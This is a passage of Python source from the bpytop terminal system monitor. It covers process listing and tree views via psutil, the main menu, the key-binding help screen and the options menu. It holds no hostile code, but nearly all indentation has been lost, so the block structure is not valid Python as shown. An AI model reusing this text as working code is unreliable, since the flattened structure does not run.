cls.det_cpu = 0.0
sorting: str = CONFIG.proc_sorting
reverse: bool = not CONFIG.proc_reversed
proc_per_cpu: bool = CONFIG.proc_per_core
search: str = cls.search_filter
err: float = 0.0
n: int = 0
if CONFIG.proc_tree and sorting == "arguments":
sorting = "program"
sort_cmd = cls.sort_expr[sorting]
if CONFIG.proc_tree:
cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
else:
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt or cls.proc_interrupt:
return
if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
continue
if p.info["cmdline"] == err:
p.info["cmdline"] = ""
if p.info["username"] == err:
p.info["username"] = ""
if p.info["num_threads"] == err:
p.info["num_threads"] = 0
if search:
if cls.detailed and p.info["pid"] == cls.detailed_pid:
cls.det_cpu = p.info["cpu_percent"]
for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
for s in search.split(","):
if s.strip() in value:
break
else: continue
break
else: continue
cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
mem = p.info["memory_percent"]
if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
mem_b = p.info["memory_info"].rss
else:
mem_b = 0
cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
out[p.info["pid"]] = {
"name" : p.info["name"],
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : p.info["num_threads"],
"username" : p.info["username"],
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu }
n += 1
cls.num_procs = n
cls.processes = out.copy()
if cls.detailed:
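			#* expand = how many extra detail columns (threads, nice, io read/write, tty) fit in the details box, capped at 5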
cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
if cls.expand > 5: cls.expand = 5
if cls.detailed and not cls.details.get("killed", False):
try:
c_pid = cls.detailed_pid
det = psutil.Process(c_pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
cls.details["killed"] = True
cls.details["status"] = psutil.STATUS_DEAD
ProcBox.redraw = True
else:
attrs: List[str] = ["status", "memory_info", "create_time"]
if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
if cls.expand:
attrs.extend(["nice", "terminal"])
if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
cls.details = det.as_dict(attrs=attrs, ad_value="")
if det.parent() != None: cls.details["parent_name"] = det.parent().name()
else: cls.details["parent_name"] = ""
cls.details["pid"] = c_pid
if c_pid in cls.processes:
cls.details["name"] = cls.processes[c_pid]["name"]
cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
cls.details["username"] = cls.processes[c_pid]["username"]
cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
else:
cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
cls.details["threads"] = f'{cls.details["num_threads"]}'
cls.details["cpu_percent"] = round(cls.det_cpu)
cls.details["killed"] = False
if SYSTEM == "MacOS":
cls.details["cpu_num"] = -1
cls.details["io_counters"] = ""
if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
else: cls.details["memory_bytes"] = "? Bytes"
if isinstance(cls.details["create_time"], float):
uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
else: cls.details["uptime"] = f'{uptime}'
else: cls.details["uptime"] = "??:??:??"
if cls.expand:
if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
if SYSTEM == "BSD":
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
else: cls.details["io_write"] = "?"
else:
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
else: cls.details["io_write"] = "?"
if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
cls.details_cpu.append(cls.details["cpu_percent"])
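				#* Exaggerate low memory percentages so they stay visible in the one row high detail graph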
mem = cls.details["memory_percent"]
if mem > 80: mem = round(mem)
elif mem > 60: mem = round(mem * 1.2)
elif mem > 30: mem = round(mem * 1.5)
elif mem > 10: mem = round(mem * 2)
elif mem > 5: mem = round(mem * 10)
else: mem = round(mem * 20)
cls.details_mem.append(mem)
if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
@classmethod
def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: str):
		'''List all processes in a tree view with pid, name, threads, username, memory percent and cpu percent'''
out: Dict = {}
err: float = 0.0
det_cpu: float = 0.0
infolist: Dict = {}
cls.tree_counter += 1
tree = defaultdict(list)
n: int = 0
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt: return
try:
tree[p.ppid()].append(p.pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
pass
else:
infolist[p.pid] = p.info
n += 1
if 0 in tree and 0 in tree[0]:
tree[0].remove(0)
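		#* Recursively walk the ppid -> pid tree; when a branch is collapsed, its children's cpu, memory and thread counts are summed into the ancestor given by collapse_to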
def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
nonlocal infolist, proc_per_cpu, search, out, det_cpu
name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
cont: bool = True
getinfo: Dict = {}
if cls.collect_interrupt: return
try:
name = psutil.Process(pid).name()
if name == "idle": return
except psutil.Error:
				cont = False
				name = ""
if pid in infolist:
getinfo = infolist[pid]
if search and not found:
if cls.detailed and pid == cls.detailed_pid:
det_cpu = getinfo["cpu_percent"]
if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
for s in search.split(","):
if s.strip() in value:
found = True
break
else: continue
break
else: cont = False
if cont:
if getinfo:
if getinfo["num_threads"] == err: threads = 0
else: threads = getinfo["num_threads"]
if getinfo["username"] == err: username = ""
else: username = getinfo["username"]
cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
mem = getinfo["memory_percent"]
if getinfo["cmdline"] == err: cmd = ""
else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
mem_b = getinfo["memory_info"].rss
else:
mem_b = 0
else:
threads = mem_b = 0
username = ""
mem = cpu = 0.0
if pid in cls.collapsed:
collapse = cls.collapsed[pid]
else:
collapse = depth > CONFIG.tree_depth
cls.collapsed[pid] = collapse
if collapse_to and not search:
out[collapse_to]["threads"] += threads
out[collapse_to]["mem"] += mem
out[collapse_to]["mem_b"] += mem_b
out[collapse_to]["cpu"] += cpu
else:
if pid in tree and len(tree[pid]) > 0:
sign: str = "+" if collapse else "-"
inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
out[pid] = {
"indent" : inindent,
"name": name,
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : threads,
"username" : username,
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu,
"depth" : depth,
}
if search: collapse = False
elif collapse and not collapse_to:
collapse_to = pid
if pid not in tree:
return
children = tree[pid][:-1]
for child in children:
create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
			create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(min(tree), tree)
cls.det_cpu = det_cpu
if cls.collect_interrupt: return
if cls.tree_counter >= 100:
cls.tree_counter = 0
for pid in list(cls.collapsed):
if not psutil.pid_exists(pid):
del cls.collapsed[pid]
cls.num_procs = len(out)
cls.processes = out.copy()
@classmethod
def sorting(cls, key: str):
index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key == "right" else -1)
if index >= len(CONFIG.sorting_options): index = 0
elif index < 0: index = len(CONFIG.sorting_options) - 1
CONFIG.proc_sorting = CONFIG.sorting_options[index]
if "left" in Key.mouse: del Key.mouse["left"]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
@classmethod
def _draw(cls):
ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
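	#* Pre-render the ascii art menu entries from MENUS, coloring every line and stacking them with cursor movements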
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Change current view mode, order full->proc->stat.",
"(F2, o)" : "Shows options.",
"(F1, h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up) (Down)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left) (Right)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f)" : "Input a string to filter processes with.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (T, t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (K, k)" : "Kill selected process with SIGKILL - 9.",
"Selected (I, i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if x <= mx < x + w and y <= my < y + h + 3:
if pages and my == y and x + 56 < mx < x + 61:
key = "up"
elif pages and my == y and x + 63 < mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "h", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
d_quote: str
inputting: bool = False
input_val: str = ""
global ARG_MODE
Theme.refresh()
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
option_items: Dict[str, List[str]] = {
"color_theme" : [
'Set color theme.',
'',
'Choose from all theme files in',
'"/usr/[local/]share/bpytop/themes" and',
'"~/.config/bpytop/themes".',
'',
'"Default" for builtin default theme.',
'User themes are prefixed by a plus sign "+".',
'',
'For theme updates see:',
'https://github.com/aristocratos/bpytop'],
"theme_background" : [
'If the theme set background should be shown.',
'',
'Set to False if you want terminal background',
'transparency.'],
"view_mode" : [
'Set bpytop view mode.',
'',
'"full" for everything shown.',
'"proc" for cpu stats and processes.',
'"stat" for cpu, mem, disks and net stats shown.'],
"update_ms" : [
'Update time in milliseconds.',
'',
'Recommended 2000 ms or above for better sample',
'times for graphs.',
'',
'Min value: 100 ms',
'Max value: 86400000 ms = 24 hours.'],
"proc_sorting" : [
'Processes sorting option.',
'',
'Possible values: "pid", "program", "arguments",',
'"threads", "user", "memory", "cpu lazy" and',
'"cpu responsive".',
'',
'"cpu lazy" updates top process over time,',
'"cpu responsive" updates top process directly.'],
"proc_reversed" : [
'Reverse processes sorting order.',
'',
'True or False.'],
"proc_tree" : [
'Processes tree view.',
'',
'Set true to show processes grouped by parents,',
'with lines drawn between parent and child',
'process.'],
"tree_depth" : [
'Process tree auto collapse depth.',
'',
				'Sets the depth where the tree view will auto',
'collapse processes at.'],
"proc_colors" : [
'Enable colors in process view.',
'',
'Uses the cpu graph gradient colors.'],
"proc_gradient" : [
'Enable process view gradient fade.',
'',
'Fades from top or current selection.',
'Max fade value is equal to current themes',
'"inactive_fg" color value.'],
"proc_per_core" : [
'Process usage per core.',
'',
'If process cpu usage should be of the core',
'it\'s running on or usage of the total',
'available cpu power.',
'',
'If true and process is multithreaded',
'cpu usage can reach over 100%.'],
"proc_mem_bytes" : [
'Show memory as bytes in process list.',
' ',
'True or False.'
],
"check_temp" : [
'Enable cpu temperature reporting.',
'',
'True or False.'],
"cpu_sensor" : [
				'Cpu temperature sensor.',
'',
'Select the sensor that corresponds to',
'your cpu temperature.',
'Set to "Auto" for auto detection.'],
"show_coretemp" : [
'Show temperatures for cpu cores.',
'',
'Only works if check_temp is True and',
'the system is reporting core temps.'],
"draw_clock" : [
'Draw a clock at top of screen.',
'',
'Formatting according to strftime, empty',
'string to disable.',
'',
'Custom formatting options:',
'"/host" = hostname',
'"/user" = username',
'',
'Examples of strftime formats:',
'"%X" = locale HH:MM:SS',
'"%H" = 24h hour, "%I" = 12h hour',
'"%M" = minute, "%S" = second',
'"%d" = day, "%m" = month, "%y" = year'],
"background_update" : [
'Update main ui when menus are showing.',
'',
'True or False.',
'',
				'Set this to false if the menus are flickering',
'too much for a comfortable experience.'],
"custom_cpu_name" : [
'Custom cpu model name in cpu percentage box.',
'',
'Empty string to disable.'],
"disks_filter" : [
'Optional filter for shown disks.',
'',
'Should be last folder in path of a mountpoint,',
'"root" replaces "/", separate multiple values',
'with a comma.',
'Begin line with "exclude=" to change to exclude',
'filter.',
				'Otherwise defaults to "most include" filter.',
'',
'Example: disks_filter="exclude=boot, home"'],
"mem_graphs" : [
'Show graphs for memory values.',
'',
'True or False.'],
"show_swap" : [
'If swap memory should be shown in memory box.',
'',
'True or False.'],
"swap_disk" : [
'Show swap as a disk.',
'',
'Ignores show_swap value above.',
'Inserts itself after first disk.'],
"show_disks" : [
'Split memory box to also show disks.',
'',
'True or False.'],
"net_download" : [
'Fixed network graph download value.',
'',
				'Default "10M" = 10 MebiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_upload" : [
'Fixed network graph upload value.',
'',
				'Default "10M" = 10 MebiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_auto" : [
'Start in network graphs auto rescaling mode.',
'',
'Ignores any values set above at start and',
'rescales down to 10KibiBytes at the lowest.',
'',
'True or False.'],
"net_sync" : [
'Network scale sync.',
'',
'Syncs the scaling for download and upload to',
'whichever currently has the highest scale.',
'',
'True or False.'],
"net_color_fixed" : [
'Set network graphs color gradient to fixed.',
'',
'If True the network graphs color is based',
'on the total bandwidth usage instead of',
'the current autoscaling.',
'',
'The bandwidth usage is based on the',
'"net_download" and "net_upload" values set',
'above.'],
"show_battery" : [
'Show battery stats.',
'',
'Show battery stats in the top right corner',
'if a battery is present.'],
"show_init" : [
'Show init screen at startup.',
'',
				'The init screen is purely cosmetic and',
'slows down start to show status messages.'],
"update_check" : [
'Check for updates at start.',
'',
'Checks for latest version from:',
'https://github.com/aristocratos/bpytop'],
"log_level" : [
'Set loglevel for error.log',
'',
'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
'The level set includes all lower levels,',
'i.e. "DEBUG" will show all logging info.']
}
option_len: int = len(option_items) * 2
sorting_i: int = CONFIG.sorting_options.index(CONFIG.proc_sorting)
loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
view_mode_i: int = CONFIG.view_modes.index(CONFIG.view_mode)
cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor)
color_i: int
while not cls.close:
key = ""
if cls.resized:
y = 9 if Term.height < option_len + 10 else Term.height // 2 - option_len // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-38
x2 = x + 27
h, w, w2 = Term.height-2-y, 26, 50
h -= h % 2
color_i = list(Theme.themes).index(THEME.current)
if option_len > h:
pages = ceil(option_len / h)
else:
h = option_len
pages = 0
page = 1
selected_int = 0
out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
selected = list(option_items)[selected_int]
if pages:
out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
#out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, opt in enumerate(option_items):
if pages and n < (page - 1) * ceil(h / 2): continue
value = getattr(CONFIG, opt)
t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
v_color = "" if opt == selected else f'{THEME.title}'
d_quote = '"' if isinstance(value, str) else ""
if opt == "color_theme":
counter = f' {color_i + 1}/{len(Theme.themes)}'
elif opt == "proc_sorting":
counter = f' {sorting_i + 1}/{len(CONFIG.sorting_options)}'
elif opt == "log_level":
counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
elif opt == "view_mode":
counter = f' {view_mode_i + 1}/{len(CONFIG.view_modes)}'
elif opt == "cpu_sensor":
counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}'
else:
counter = ""
out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
if opt == selected:
if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "view_mode", "cpu_sensor"]:
out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
elif inputting:
out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
else:
out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
else:
out += f'{d_quote + str(value) + d_quote:^24.24}'
out += f'{Term.bg}'
if opt == selected:
h2 = len(option_items[opt]) + 2
y2 = y + (selected_int * 2) - ((page-1) * h)
if y2 + h2 > Term.height: y2 = Term.height - h2
out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
for n, desc in enumerate(option_items[opt]):
out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
cy += 2
if cy >= h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
if not skip or redraw:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
redraw = True
has_sel = False
if key == "mouse_click" and not inputting:
mx, my = Key.get_mouse()
if x < mx < x + w and y < my < y + h + 2:
mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
if pages and my == y+h+1 and x+11 < mx < x+16:
key = "page_up"
elif pages and my == y+h+1 and x+19 < mx < x+24:
key = "page_down"
elif my == y+h+1:
pass
elif mouse_sel == selected_int:
if mx < x + 6:
key = "left"
elif mx > x + 19:
key = "right"
else:
key = "enter"
elif mouse_sel < len(option_items):
selected_int = mouse_sel
has_sel = True
else:
key = "escape"
if inputting:
if key in ["escape", "mouse_click"]:
inputting = False
elif key == "enter":
inputting = False
if str(getattr(CONFIG, selected)) != input_val:
if selected == "update_ms":
if not input_val or int(input_val) < 100:
CONFIG.update_ms = 100
elif int(input_val) > 86399900:
CONFIG.update_ms = 86399900
else:
CONFIG.update_ms = int(input_val)
elif selected == "tree_depth":
if not input_val or int(input_val) < 0:
CONFIG.tree_depth = 0
else:
CONFIG.tree_depth = int(input_val)
ProcCollector.collapsed = {}
elif isinstance(getattr(CONFIG, selected), str):
setattr(CONFIG, selected, input_val)
if selected.startswith("net_"):
NetCollector.net_min = {"download" : -1, "upload" : -1}
elif selected == "draw_clock":
Box.clock_on = len(CONFIG.draw_clock) > 0
if not Box.clock_on: Draw.clear("clock", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key == "backspace" and len(input_val):
input_val = input_val[:-1]
elif key == "delete":
input_val = ""
elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
input_val += key
elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
input_val += key
elif key == "q":
clean_quit()
elif key in ["escape", "o", "M", "f2"]:
cls.close = True
break
elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download", "net_upload", "draw_clock", "tree_depth"]:
inputting = True
input_val = str(getattr(CONFIG, selected))
elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
CONFIG.tree_depth -= 1
ProcCollector.collapsed = {}
elif key == "right" and selected == "tree_depth":
CONFIG.tree_depth += 1
ProcCollector.collapsed = {}
elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
setattr(CONFIG, selected, not getattr(CONFIG, selected))
if selected == "check_temp":
if CONFIG.check_temp:
CpuCollector.get_sensors()
else:
CpuCollector.sensor_method = ""
CpuCollector.got_sensors = False
if selected in ["net_auto", "net_color_fixed", "net_sync"]:
if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
NetBox.redraw = True
if selected == "theme_background":
Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(Term.bg)
if selected == "show_battery":
Draw.clear("battery", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
if key == "left":
color_i -= 1
if color_i < 0: color_i = len(Theme.themes) - 1
elif key == "right":
color_i += 1
if color_i > len(Theme.themes) - 1: color_i = 0
